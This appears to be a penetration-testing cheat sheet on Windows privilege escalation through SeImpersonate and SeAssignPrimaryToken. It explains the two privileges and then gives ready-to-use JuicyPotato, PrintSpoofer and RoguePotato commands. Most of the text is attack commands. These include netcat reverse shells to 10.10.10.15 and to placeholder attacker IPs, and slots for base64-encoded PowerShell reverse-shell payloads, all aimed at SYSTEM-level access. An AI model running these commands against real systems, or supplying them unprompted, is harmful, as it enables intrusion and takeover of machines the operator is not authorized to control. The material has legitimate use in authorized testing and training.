SeImpersonate/SeAssignPrimaryToken
SeImpersonatePrivilege allows a process to impersonate another user, enabling privilege escalation if a high-privilege token is accessible. SeAssignPrimaryTokenPrivilege lets a process assign an arbitrary token to a new process, allowing privilege manipulation. These privileges are often abused in Windows privilege escalation techniques like JuicyPotato, RoguePotato, and PrintSpoofer. Exploiting them can grant SYSTEM-level access from a low-privileged account.
SeImpersonate & JuicyPotato
- Transfer
JuicyPotato.exeto the target system. - Find a valid CLSID:
- Check online lists or use a tool like
GetCLSID.ps1
- Check online lists or use a tool like
- Execute JuicyPotato:
# PowerShell Base64-Encoded Reverse Shell
JuicyPotato.exe -p powershell.exe -a "<encoded_payload>"
# Netcat Reverse Shell
JuicyPotato.exe -l <COM-SERVER-LISTENING-PORT> -p C:\Windows\System32\cmd.exe -a "/c c:\nc.exe 10.10.10.15 1337 -e cmd.exe" -t *
-l 1337→ Arbitrary listening port-p cmd.exe→ Payload to execute (e.g., a reverse shell)-t *→ Auto-detect token type-c {CLSID}→ COM Server CLSID to abuse
-
Confirm SYSTEM Access:
whoami
PrintSpoofer & RoguePotato
tip
Since JuicyPotato for SeImpersonate/SeAssignPrimaryToken doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards, we will use RoguePotato and PrintSpoofer.
- PrintSpoofer
- RougePotato
PrintSpoofer64.exe -c "C:\Path\to\nc.exe -e cmd.exe <ATTACKER_IP> <PORT>" -i
# PowerShell Base64-Encoded Reverse Shell
PrintSpoofer64.exe -c "<POWERSHELL_BASE64_ENCODED>" -i
RoguePotato.exe -r <ATTACKER_IP> -l <LOCAL_PORT> -e "C:\Path\to\nc.exe -e cmd.exe <ATTACKER_IP> <PORT>"
# PowerShell Base64-Encoded Reverse Shell
RoguePotato.exe -r <ATTACKER_IP> -l <LOCAL_PORT> -e "<POWERSHELL_BASE64_ENCODED>"